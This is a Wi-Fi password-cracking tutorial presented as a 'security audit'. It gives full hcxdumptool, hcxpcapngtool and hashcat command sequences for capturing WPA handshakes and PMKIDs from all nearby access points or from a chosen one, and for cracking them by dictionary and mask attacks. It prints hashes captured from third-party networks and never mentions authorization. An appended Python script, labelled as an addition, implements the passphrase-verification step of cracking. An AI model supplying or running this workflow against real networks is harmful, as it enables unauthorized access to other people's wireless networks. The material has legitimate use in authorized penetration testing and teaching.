Wi-Fi security audit with Hashcat and hcxdumptool
Table of contents
1. New Wi-Fi security audit guide
2. Up-to-date Wi-Fi security audit tools
3. Command summary for Wi-Fi security audit
4. Stop processes that might interfere with handshake and PMKID capturing
5. Manage wireless network interfaces
6. Handshakes and PMKID capture
7. Convert captured data to hash
8. Password cracking
See the first part here: Wi-Fi security audit improved: new tools, hash, and techniques
New Wi-Fi security audit guide
Capturing the 4-Way Handshake or the PMKID (see “Hacking Wi-Fi without users”) remains the most universal way to recover a WPA/WPA2-PSK password: it works against any Access Point, because both values are derived from the pre-shared key. For some Access Points there are faster methods that exploit vulnerabilities or use an accumulated database of vulnerable routers (“How to hack Wi-Fi”), but those depend on the router model.
Let's consider a modern attack: capturing handshakes and PMKIDs with hcxdumptool, converting them to the new hash format with hcxpcapngtool, and cracking that hash at full graphics card speed with Hashcat.
Up-to-date Wi-Fi security audit tools
This guide uses the following tools:
- hcxdumptool
- hcxtools (a toolbox); this guide uses the hcxpcapngtool and hcxhashtool utilities from it
- hashcat
If any of these programs are not installed on your system, then follow the links above to install the tools on your distribution.
Command summary for Wi-Fi security audit
Here are the most important commands – in case you do not have time to read the article in full.
Network interface names:
hcxdumptool -I
A typical command for capturing data:
hcxdumptool -i INTERFACE -o FILE.pcapng --active_beacon --enable_status=15
Captured wireless frames are saved to FILE.pcapng (dumpfile.pcapng in the examples below). Convert this file to hashes:
hcxpcapngtool -o hash.hc22000 -E wordlist dumpfile.pcapng
A hash.hc22000 file with hashes will be created.
To view information about hashes, use the hcxhashtool utility:
hcxhashtool --info=stdout -i hash.hc22000
Dictionary attack:
hashcat -m 22000 -a 0 hash.hc22000 WORDLIST.txt
Mask attack example:
hashcat -m 22000 -a 3 hash.hc22000 ?d?d?d?d?d?d?d?d
Stop processes that might interfere with handshake and PMKID capturing
A Wi-Fi network security audit can be divided into:
- the online attack, when the data needed to recover the wireless network password is captured. During this stage you must be within range of the target Access Point, and it must be powered on, i.e. “online”
- the offline attack, when the password is brute-forced from the captured data. At this point you can be anywhere, and the Access Point can even be turned off; this does not affect the result of the attack
During the online stage, it is strongly recommended to stop services that may interfere with the operation of network interfaces:
sudo systemctl stop NetworkManager
sudo systemctl stop wpa_supplicant
After the capturing of handshakes and PMKID is complete, you can start NetworkManager again (wpa_supplicant will be started automatically):
sudo systemctl start NetworkManager
Manage wireless network interfaces
hcxdumptool is a versatile utility: besides performing wireless attacks, it can show the status of wireless network interfaces and manage them.
To display a list of wireless interfaces, use the command:
hcxdumptool -I
Sample output (yes, I have a collection of adapters based on various chipsets: Realtek, Atheros, Intel and Mediatek):
wlan interfaces:
c0b6f9daaf3e wlo1 (iwlwifi)
00c0ca96cfcb wlp0s20f0u2 (ath9k_htc) warning:spoofed MAC e20def45c3f8 detected
00c0ca900d9f wlp0s20f0u1 (rt2800usb) warning:spoofed MAC e2b48830044d detected
00c0cab026eb wlp0s20f0u5 (mt76x2u) warning:spoofed MAC 72fe786e01f0 detected
You can get the same result with the command:
iw dev
With the command like
sudo hcxdumptool -i INTERFACE -C
you can view the channels supported by the wireless adapter.
For instance:
sudo hcxdumptool -i wlp0s20f0u1 -C
You can display similar information with the command
iw list
The --check_driver option runs several tests to make sure that the driver supports all the ioctl() system calls hcxdumptool needs. The driver must support monitor mode and full packet injection, otherwise hcxdumptool will not work properly:
sudo hcxdumptool -i INTERFACE --check_driver
For instance:
sudo hcxdumptool -i wlp0s20f0u1 --check_driver
The key lines in the output are:
driver tests passed... all required ioctl() system calls are supported by driver
They mean that this wireless adapter is fully suitable for performing wireless attacks.
With the --check_injection option, you can run an antenna test and a wireless packet injection test to determine whether the driver supports full packet injection.
The results of this test are not stable, because they depend on a number of factors: proximity to Access Points and signal quality, which in turn can change with interference.
Another way to check whether packet injection works is to start the tool with the --do_rcascan option: the program lists the Access Points within range together with an INJECTION-RATIO. To obtain meaningful results, let it run for at least 13 * 5 seconds (13 channels, and by default it listens on each channel for 5 seconds):
sudo hcxdumptool -i INTERFACE --do_rcascan
For instance:
sudo hcxdumptool -i wlp0s20f0u1 --do_rcascan
Pay attention to the table header:
BSSID FREQ CH RSSI BEACON RESPONSE ESSID SCAN-FREQ: 2432 INJECTION-RATIO: 30% [18:59:25]
It contains the INJECTION-RATIO value. A value above zero means that frames injected by the adapter are being answered by Access Points in range; a persistent 0% means injection is not working (or nothing is in range).
If the AP is within reach, you can proceed with the attack.
If hcxdumptool cannot configure your adapter through ioctl() for some reason, you can put the interface into monitor mode the usual way before starting it (the hcxdumptool author recommends this only as a last resort):
sudo ip link set <INTERFACE> down
sudo iw <INTERFACE> set monitor control
sudo ip link set <INTERFACE> up
Handshakes and PMKID capture
Attack all APs
A typical command for capturing data:
hcxdumptool -i INTERFACE -o FILE.pcapng --active_beacon --enable_status=15
In this command, FILE.pcapng is the file where the captured wireless frames will be saved.
Example of my command:
sudo hcxdumptool -i wlp0s20f0u2 -o dumpfile.pcapng --active_beacon --enable_status=15
The default channel switching time is 5 seconds. This is more suitable if you are on the move, that is, for mobile attacks. If you are located permanently and are not in a hurry, then the operating time on each channel can be increased, for example, up to two minutes (option -t SECONDS):
sudo hcxdumptool -i wlp0s20f0u2 -o dumpfile.pcapng --active_beacon --enable_status=15 -t 120
If you do not want your wireless adapter to transmit any frames, specify the --silent option. This disables the deauthentication attack and the attack on clients without an AP (both require injection), but it makes you invisible to wireless activity monitoring devices.
By default, hcxdumptool automatically selects the channels on which it listens and captures data. With the -c NUMBER option you can set the frequency (2437,2462,5600,…) or the channel (1,2,3,…) yourself, as a comma-separated list. Default: auto frequency/auto band. Maximum number of entries: 255. Values between 0 and 1000 are treated as channel numbers and values above 1000 as frequencies in MHz.
On 5GHz and 6GHz it is recommended to use the frequency instead of the channel numbers since the channel numbers are not unique here. Standard 802.11 channels (device, driver and world regulatory domain dependent): https://en.wikipedia.org/wiki/List_of_WLAN_channels
With the -s NUMBER option you can set a predefined scan list, the following lists are available:
- 0 = auto frequency/auto band (default)
- 1 = 1,6,11,3,5,1,6,11,2,4,1,6,11,7,9,1,6,11,8,10,1,6,11,12,13 (optimized 2.4GHz)
- 2 = 1,2,3,4,5,6,7,8,9,10,11,12,13 (standard 2.4 GHz)
- 3 = 36,40,44,48,52,56,60,64,100,104,108,112,116,120,124,128,132,136,140,144,149,153,157,161,165 (standard 5GHz)
- 4 = 1,2,3,4,5,6,7,8,9,10,11,12,13,36,40,44,48,52,56,60,64,100,104,108,112,116,120,124,128,132,136,140,144,149,153,157,161,165 (standard 2.4GHz/5GHz)
If you want to save the coordinates of the wireless Access Points / track your movement, use the options:
--use_gps_device=DEVICE
- use a GPS device such as /dev/ttyACM0, /dev/ttyUSB0, … (NMEA 0183 standard, $GPGGA and $GPRMC sentences)
--use_gpsd
- use a GPSD device (NMEA 0183 standard, $GPGGA and $GPRMC sentences)
--nmea=FILE
- save the track to a file. Format: NMEA 0183 $GPGGA, $GPRMC, $GPWPL
See also: How to use Android phone as GPS sensor in Linux
(At this point the article shows an example of the status log that hcxdumptool prints while running.) You can find an explanation of the abbreviations used in it in the “Abbreviations” section on the program page: https://en.kali.tools/?p=841.
Attack a specific AP
To attack a specific Access Point, assuming that you know its name (ESSID), you need to know the channel on which it operates and its MAC address (BSSID). This information can be collected by running hcxdumptool with the --do_rcascan option:
sudo hcxdumptool -i wlp0s20f0u2 --do_rcascan
Let's say I'm interested in an access point with the network name RT-728005:
BSSID        FREQ CH RSSI BEACON RESPONSE ESSID      SCAN-FREQ: 2422 INJECTION-RATIO: 27% [12:51:31]
-----------------------------------------------------------------------------------------------------
…
…
c891f9c7eff6 2412  1  113     47       34 RT-728005
…
…
You need to add options to the hcxdumptool command:
- --filtermode=2 – use the filter list as a target list (whitelist); 1 would use it as a protect list (blacklist), 0 disables filtering
- --filterlist_ap=MAC_OR_FILE_WITH_MAC – the BSSID to attack, or a file with one MAC per line
- -c CHANNEL – stay on the AP's channel instead of hopping
For example, the RT-728005 AP that interests me operates on channel 1 and has BSSID c891f9c7eff6, so the command is:
sudo hcxdumptool -i wlp0s20f0u2 -o RT-728005.pcapng --active_beacon --enable_status=15 --filtermode=2 --filterlist_ap=c891f9c7eff6 -c 1
Captured wireless frames are saved to file RT-728005.pcapng. Convert this file to hash:
hcxpcapngtool -o RT-728005.hc22000 -E wordlist RT-728005.pcapng
Viewing hash information:
hcxhashtool --info=stdout -i RT-728005.hc22000
This ends the online stage. Now you can start NetworkManager again:
sudo systemctl start NetworkManager
Convert captured data to hash
To convert capture to the hash, use the following command:
hcxpcapngtool -o HASH.hc22000 -E WORDLIST CAPTURE_FILE.pcapng
In this command:
- HASH.hc22000 is a file where all converted hashes will be placed
- WORDLIST is a file with strings worth trying as passwords: the names of the APs seen (ESSIDs) and other strings transmitted in cleartext. Sometimes the Wi-Fi password itself turns up here, because some especially poorly designed devices transmit it in plaintext
- CAPTURE_FILE.pcapng is a file with wireless frames that we captured in the previous step
Command example:
hcxpcapngtool -o hash.hc22000 -E wordlist dumpfile.pcapng
The hash.hc22000 file will be created with the hashes, and statistics of the captured data will be displayed.
Hashes example:
WPA*02*cf8d06ec4aeba37f5288e65ad802f5d3*10ae604c41e6*d4124342bd39*54502d4c696e6b5f303132365f455854*dbb9bae2cb780756c822938f252ac6c231b8246cd85e77fdcc985ee97ed35de8*0103007502010a0000000000000000f53c8d7a67dcf998fcc7e71de2b8fc076845c7fce4b04c7f1a52a67f03c2970bfc34000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020000*10
WPA*02*db391bf2742b8f862aa0656f4a3ab063*10ae604c41e7*b4fbe33717a0*616b3834*dbb9bae2cb780756c822938f252ac6c231b8246cd85e77fdcc985ee97ed35de8*0103007502010a0000000000000000f53c54c7c5c35fead373561cc26664649e6f6d3664765abdba3e1396442e3dbf7043000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020000*10
WPA*02*3d40af734bfaaaeb4649e0eab240a39e*10ae604c41e8*ee48b8e81589*54502d4c696e6b5f303132365f3547*dbb9bae2cb780756c822938f252ac6c231b8246cd85e77fdcc985ee97ed35de8*0103007502010a0000000000000000f53c93bb8236f147d14d1f562b4f59cf7b050dc4b76f6faa5fdd0aa9cc233b6b06b5000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020000*10
WPA*02*efb03520bbd51818ff1bedd948633d0d*1c3bf3110126*28565a0ce1b1*54502d4c696e6b5f30313236*dbb9bae2cb780756c822938f252ac6c231b8246cd85e77fdcc985ee97ed35de8*0103007502010a0000000000000000f53c684d1db707cb77070f2f82f2e7dcc3d13588651a03283cd42e5ceab8dcc4ab57000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020000*10
WPA*02*4dd975abac76732237967a7751880a27*52ff20513c4c*b4fbe33717a0*616b3834*dbb9bae2cb780756c822938f252ac6c231b8246cd85e77fdcc985ee97ed35de8*0103007502010a0000000000000000f53cab25d6ef96c3a0295c2849e02799b777f6aa88a0169d645547f4c72862d7092b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020000*10
WPA*02*f8021dd2fbac283ed9abbae33d507636*68ff7b2b33d0*420a96ef1527*54502d4c696e6b5f333343455f3547*dbb9bae2cb780756c822938f252ac6c231b8246cd85e77fdcc985ee97ed35de8*0203007502010a0010000000000000f53ceeaa8e20f3d31a31ed31b99431c72fff3b8a8b4568bdf09bc68b952742a484c9000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020c00*10
WPA*02*87ca0740cc9115d80092b4481ccd0f7f*68ff7b2b33d0*5e02e859bc68*54502d4c696e6b5f333343455f3547*71159d9a8e714aabb36f449f603bcc3a5b1d754c5ee756b314e4ee8e475e31fa*0103007502010a001000000000000000010335e9a1c1859746102aa540f063c6d2843ac8b6334b23aab61a1441564d4448000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020c00*02
WPA*02*2b25289c5d103de4455c605185f16799*68ff7b2b33d0*6e4138786697*54502d4c696e6b5f333343455f3547*dbb9bae2cb780756c822938f252ac6c231b8246cd85e77fdcc985ee97ed35de8*0103007502010a0000000000000000f53c0a63db353cb974e01b619ccb5a2505ed25df29630f9dab7ff09a6e7579095024000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac02ac24*10
WPA*01*472dca0f8d8fddc252c3eb15f8fe77ab*8c10d4c712b6*b0febd84cfaa*526f7374656c65636f6d5f433731324236***
WPA*01*784d7491048ba9d3fa68f64e294453cf*b09575bddc88*b0febd84cfaa*54502d4c696e6b5f444338365f3547***
WPA*01*b07fec80cc50c50aeddf66d599d24f2b*cc32e5b688f2*b0febd84cfaa*54502d4c696e6b5f383846305f3547***
WPA*01*8037d5a102f36040899b8c66f440c44b*e8018d3f4418*b0febd84cfaa*66685f336634343138***
WPA*02*2c68c0106fca98afb4ced71b9fc9d9c9*e848b8e81588*d4124342bd39*54502d4c696e6b5f303132365f455854*a736810c5a6dffb7317c1c88ca16afe6572762f186674e71879bcbb0c53e820b*0103007502010a00000000000000000001fbf958785389e5a6d68fd7446e2a0f4a858632bf4d103b73b66d6cc459622c0b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020000*02
The hash structure is as follows:
PROTOCOL*TYPE*PMKID/MIC*MACAP*MACCLIENT*ESSID*ANONCE*EAPOL*MESSAGEPAIR
Where:
- PROTOCOL = Fixed string "WPA"
- TYPE = 01 for PMKID, 02 for EAPOL
- PMKID/MIC = PMKID if TYPE=01, MIC if TYPE=02
- MACAP = MAC of AP
- MACCLIENT = MAC of CLIENT
- ESSID = network name (ESSID) in HEX
- ANONCE = ANONCE
- EAPOL = EAPOL (SNONCE is in here)
- MESSAGEPAIR = bitmask (one hex byte):
- bits 0–2: MP info, the message pair number as in the hccapx format (https://hashcat.net/wiki/doku.php?id=hccapx)
- 3: x (unused)
- 4: ap-less attack (set to 1) - no nonce-error-corrections necessary
- 5: LE router detected (set to 1) - nonce-error-corrections only for LE necessary
- 6: BE router detected (set to 1) - nonce-error-corrections only for BE necessary
- 7: not replaycount checked (set to 1) - replaycount not checked, nonce-error-corrections definitely necessary
To view information about hashes, use the hcxhashtool utility:
hcxhashtool --info=stdout -i FILE.HASH
For instance:
hcxhashtool --info=stdout -i hash.hc22000
A list of hashes and their characteristics will be displayed.
hcxhashtool has a number of filters, the most useful of which are:
--essid=<ESSID>              : filter by ESSID
--essid-part=<part of ESSID> : filter by part of ESSID
--essid-list=<file>          : filter by ESSID file
--mac-skiplist=<file>        : exclude MACs listed in the file; format: 001122334455, 00:11:22:33:44:55, 00-11-22-33-44-55 (hex)
For example, the following command will display information only about the AP named TP-Link_0126
hcxhashtool --info=stdout -i hash.hc22000 --essid=TP-Link_0126
If you want to extract a single hash, or exclude certain hashes, use a filter (one of those above, or any from the full list of options at https://en.kali.tools/?p=847#hcxhashtool) together with the -o option, which specifies the file where the selected hashes should be stored:
hcxhashtool -i hash.hc22000 --essid=ak84 -o ak84.hc22000
If you want only one hash per network name, use the following construction (sort -t "*" -k 6,6 -u keeps the first hash for each distinct ESSID field; use -k 4,4 to key on the BSSID instead, since several Access Points can broadcast the same ESSID):
sort -t "*" -k 6,6 -u hash.hc22000 > hash.hc22000.uniq
hcxhashtool --info=stdout -i hash.hc22000.uniq
Password cracking
An example of a dictionary attack; the hashes are stored in the hash.hc22000 file.
Download the dictionary:
wget https://wpa-sec.stanev.org/dict/cracked.txt.gz
Run the dictionary attack:
hashcat -m 22000 -a 0 hash.hc22000 cracked.txt.gz
Mask attack example:
hashcat -m 22000 -a 3 hash.hc22000 ?d?d?d?d?d?d?d?d
Options that might come in handy:
- --hwmon-temp-abort=100: abort the attack if a GPU reaches 100 °C (the default threshold is 90 °C)
- -d 1: run only on backend device number 1 (hashcat -I lists the devices)
Examples of my real commands:
hashcat --hwmon-temp-abort=100 -a 0 -m 22000 -d 1 RT-728005.hash rockyou_cleaned.txt
hashcat --hwmon-temp-abort=100 -a 3 -m 22000 -d 1 RT-728005.hash ?d?d?d?d?d?d?d?d
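The hc22000 structure described above, the “one hash per AP” selection, and what a -m 22000 cracker actually has to compute, as an added example in Python (this is not code from the article, from hcxtools or from hashcat). It parses hc22000 lines, decodes the MESSAGEPAIR bits, keeps one line per BSSID, and verifies a candidate passphrase the way hashcat must: PBKDF2-HMAC-SHA1 for the PMK, then either the PMKID (HMAC-SHA1 over "PMK Name" || AA || SPA) or the KCK from the 802.11 PRF-384 and the EAPOL MIC (HMAC-MD5 for key descriptor version 1, HMAC-SHA1-128 for version 2). The sample lines are constructed: the MAC addresses and nonces are made up, the ESSID/passphrase pair IEEE/password is the IEEE 802.11 PBKDF2 test vector, and the EAPOL message 2 is assembled by the script itself, so the MIC check proves the script is self-consistent rather than validating a real capture. The one real line is a PMKID hash copied from the article's output. Nonce error correction (MESSAGEPAIR bits 5 to 7) and key descriptor version 3 (AES-CMAC) are not handled.

```python
"""Added example (not code from the article, hcxtools or hashcat): parse hc22000
lines, keep one hash per BSSID, and check a candidate passphrase the way a
WPA-PBKDF2-PMKID+EAPOL cracker (hashcat -m 22000) has to. Standard library only."""
import hashlib
import hmac
from dataclasses import dataclass


@dataclass
class Hc22000:
    kind: str         # "PMKID" (TYPE=01) or "EAPOL" (TYPE=02)
    digest: bytes     # PMKID or MIC, 16 bytes
    ap: bytes         # MACAP (BSSID), 6 bytes
    client: bytes     # MACCLIENT, 6 bytes
    essid: bytes      # ESSID, de-hexed
    anonce: bytes     # 32 bytes on EAPOL lines, empty on PMKID lines
    eapol: bytes      # raw EAPOL frame with the MIC field zeroed; empty on PMKID lines
    messagepair: int  # MESSAGEPAIR bitmask (hex byte); 0 on PMKID lines


def parse_line(line: str) -> Hc22000:
    """Split PROTOCOL*TYPE*PMKID/MIC*MACAP*MACCLIENT*ESSID*ANONCE*EAPOL*MESSAGEPAIR."""
    f = line.strip().split("*")
    if len(f) != 9 or f[0] != "WPA" or f[1] not in ("01", "02"):
        raise ValueError("not an hc22000 line: %r" % line)
    return Hc22000("PMKID" if f[1] == "01" else "EAPOL",
                   bytes.fromhex(f[2]), bytes.fromhex(f[3]), bytes.fromhex(f[4]),
                   bytes.fromhex(f[5]), bytes.fromhex(f[6]), bytes.fromhex(f[7]),
                   int(f[8], 16) if f[8] else 0)


def describe_messagepair(mp: int) -> dict:
    """Decode the MESSAGEPAIR bits listed in the article."""
    return {"mp_info": mp & 0x07, "apless": bool(mp & 0x10),
            "le_router": bool(mp & 0x20), "be_router": bool(mp & 0x40),
            "replaycount_unchecked": bool(mp & 0x80)}


def one_per_ap(lines):
    """Keep one line per BSSID. sort -k 6,6 in the article keys on the ESSID;
    keying on MACAP also separates APs that broadcast the same network name.
    Preference: a PMKID line, then an EAPOL line whose replay counter was checked."""
    best = {}
    for line in lines:
        h = parse_line(line)
        rank = (h.kind != "PMKID", bool(h.messagepair & 0x80))
        if h.ap not in best or rank < best[h.ap][0]:
            best[h.ap] = (rank, line.strip())
    return [kept for _, kept in best.values()]


def pmk_from_passphrase(passphrase: str, essid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes).
    This is the expensive step a cracker repeats per candidate; the rest is a few HMACs."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid, 4096, 32)


def pmkid(pmk: bytes, ap: bytes, client: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA)."""
    return hmac.new(pmk, b"PMK Name" + ap + client, hashlib.sha1).digest()[:16]


def kck(pmk: bytes, ap: bytes, client: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """First 16 bytes of the PTK (the KCK) from the 802.11 PRF-384 built on HMAC-SHA1."""
    data = min(ap, client) + max(ap, client) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                       hashlib.sha1).digest() for i in range(3)]
    return b"".join(blocks)[:16]


def check_passphrase(h: Hc22000, passphrase: str) -> bool:
    """True if the passphrase reproduces the PMKID or the EAPOL MIC stored in the hash."""
    pmk = pmk_from_passphrase(passphrase, h.essid)
    if h.kind == "PMKID":
        return hmac.compare_digest(pmkid(pmk, h.ap, h.client), h.digest)
    keyver = int.from_bytes(h.eapol[5:7], "big") & 0x07  # Key Information, low 3 bits
    snonce = h.eapol[17:49]                                # Key Nonce field (SNONCE in M2)
    k = kck(pmk, h.ap, h.client, h.anonce, snonce)
    if keyver == 1:    # TKIP: HMAC-MD5
        mic = hmac.new(k, h.eapol, hashlib.md5).digest()
    elif keyver == 2:  # CCMP: HMAC-SHA1 truncated to 128 bits
        mic = hmac.new(k, h.eapol, hashlib.sha1).digest()[:16]
    else:              # 3 = AES-128-CMAC (SHA-256 AKMs): not covered by this example
        raise NotImplementedError("key descriptor version %d" % keyver)
    return hmac.compare_digest(mic, h.digest)


def build_sample(passphrase: str = "password", essid: bytes = b"IEEE") -> list:
    """Constructed sample: made-up MACs and nonces, the RSN IE from the article's
    hashes as key data, and the IEEE 802.11 test passphrase/SSID. The EAPOL M2 and
    its MIC are assembled here, so this is a self-consistency check, not a capture."""
    ap, client = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    pmk = pmk_from_passphrase(passphrase, essid)
    key_data = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x00" + bytes(8) + snonce + bytes(16)
            + bytes(8) + bytes(8) + bytes(16) + len(key_data).to_bytes(2, "big") + key_data)
    eapol = b"\x01\x03" + len(body).to_bytes(2, "big") + body   # MIC field already zero
    mic = hmac.new(kck(pmk, ap, client, anonce, snonce), eapol, hashlib.sha1).digest()[:16]
    head = "WPA*%s*%s*" + ap.hex() + "*" + client.hex() + "*" + essid.hex() + "*"
    return [head % ("01", pmkid(pmk, ap, client).hex()) + "**",
            head % ("02", mic.hex()) + anonce.hex() + "*" + eapol.hex() + "*02"]


if __name__ == "__main__":
    for line in one_per_ap(build_sample()):
        h = parse_line(line)
        print(h.kind, h.essid.decode(), describe_messagepair(h.messagepair),
              check_passphrase(h, "password"), check_passphrase(h, "Password"))
```

Running it prints one line for the PMKID hash that one_per_ap keeps: the right passphrase verifies and a one-letter variation does not. To try it on a real hcxpcapngtool output, feed the file's lines instead of build_sample(); expect misses on EAPOL lines whose MESSAGEPAIR has bits 5 to 7 set, because the nonce correction hashcat applies is not implemented here, and note that the PBKDF2 step is why a GPU, not this script, is the right tool for the offline stage.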
Related articles:
- Wi-Fi security audit improved: new tools, hash, and techniques
- Hacking Wi-Fi without users
- Hacking Wi-Fi without users in Aircrack-ng
- How to use precomputed tables to crack Wi-Fi passwords in Hashcat and John the Ripper
- Hacking Wi-Fi without clients on Windows (using Wireshark and Npcap to capture PMKID)
- USB Wi-Fi Adapters with monitor mode and wireless injection (100% compatible with Kali Linux) 2022